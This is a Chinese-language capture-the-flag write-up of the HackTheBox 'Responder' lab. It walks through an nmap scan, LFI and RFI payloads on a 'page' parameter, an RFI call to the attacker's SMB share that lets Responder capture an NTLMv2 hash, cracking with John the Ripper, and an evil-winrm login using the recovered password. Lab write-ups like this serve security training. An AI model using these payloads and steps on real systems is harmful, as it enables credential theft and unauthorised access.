freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

HackTheBox-Responder
2022-08-27 19:42:34
所属地 浙江省

第1层-Responder

首先获取到靶机

image-20220822201042236

任务1

How many TCP ports are open on the machine?

机器上打开了多少个 TCP 端口?

使用nmap扫描一下全端口

sudo nmap -sS -sV 10.129.135.227 -p- -T5 -vv

image-20220822204425596

任务2

When visiting the web service using the IP address, what is the domain that we are being redirected to?

使用 IP 地址访问 Web 服务时,我们被重定向到的域是什么?

这里使用浏览器访问一下,得到答案

image-20220822202858437

unika.htb

这里虽然重定向到了域名,但是页面显示找不到。因此我们需要将该域名添加到主机的/etc/hosts文件中

image-20220822203611041

image-20220822203902213

任务3

Which scripting language is being used on the server to generate webpages?

服务器上使用哪种脚本语言来生成网页?

利用Wappalyzer插件进行查看即可

image-20220822203932548

任务4

What is the name of the URL parameter which is used to load different language versions of the webpage?

用于加载不同语言版本网页的 URL 参数的名称是什么?

当我们更改网站语言时,url上会显示page参数,将页面传入。说明此处可能存在文件包含漏洞

image-20220822204732171

page

任务5

Which of the following values for the pageparameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

page参数的以下哪个值是利用本地文件包含 (LFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

image-20220822204850014

../../. ./../../../../../windows/system32/drivers/etc/hosts

任务6

Which of the following values for the pageparameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

page参数的以下哪个值是利用远程文件包含 (RFI) 漏洞的示例:“french.html”、“//10.10.14.6/somefile”、“../../. ./../../../../../windows/system32/drivers/etc/hosts”, “minikatz.exe”

//10.10.14.6/somefile

任务7

What does NTLM stand for?

NTLM 代表什么?

New Technology LAN Manager

任务8

Which flag do we use in the Responder utility to specify the network interface?

我们在 Responder 实用程序中使用哪个标志来指定网络接口?

-I

responder工具有向LLMNR和NBT-NS请求进行欺骗的能力,欺骗受害主机发送NTLM v2 Hash。当网络中任何一台计算机尝试使用LLMNR或NBT-NS请求来解析目标计算机时,Responder假装为目标计算机,而当受害者计算机尝试访问攻击者计算机时,Responder就可以捕获受害者计算机用户的NTLMv2哈希,然后使用工具破解hash

Responder原理可参考https://www.freebuf.com/articles/network/256844.html

任务9

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john, but the full name is what?.

有几种工具可以接受 NetNTLMv2 质询/响应并尝试数百万个密码,以查看它们中的任何一个是否生成相同的响应。一种这样的工具通常被称为“john”,但全名是什么?

john the ripper  #用于破解NTLM哈希

任务10

What is the password for the administrator user?

管理员用户的密码是什么?

首先下载Responder工具https://github.com/lgandx/Responder

使用python运行responder监听指定网卡

python3 Responder.py -I <Interface_card_name>

image-20220822220243838

由于网站存在RFI漏洞,可以利用远程访问本地任意文件,访问本地后,responder可以拿到administrator的hash密码

http://unika.htb/index.php?page=//10.10.14.173/somefile

image-20220822220320941

将hash保存到本地(也可使用./DumpHash.py导出捕获的哈希值),然后使用john工具进行破解(时间特别久,也可使用hashcat)

image-20220822224013728

任务11

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

我们将使用 Windows 服务(即在盒子上运行)使用我们恢复的密码远程访问 Responder 机器。它侦听的 TCP 端口是什么?

nmap扫描出的结果为5985

Flag

得到了服务器的用户和密码之后,使用evil-winrm工具连接服务器

evil-winrm -i 10.129.135.227 -u Administrator -p badminton

image-20220822224945172

成功连接,翻阅下目录,最后在mike用户的Desktop目录中发现了flag


# web安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录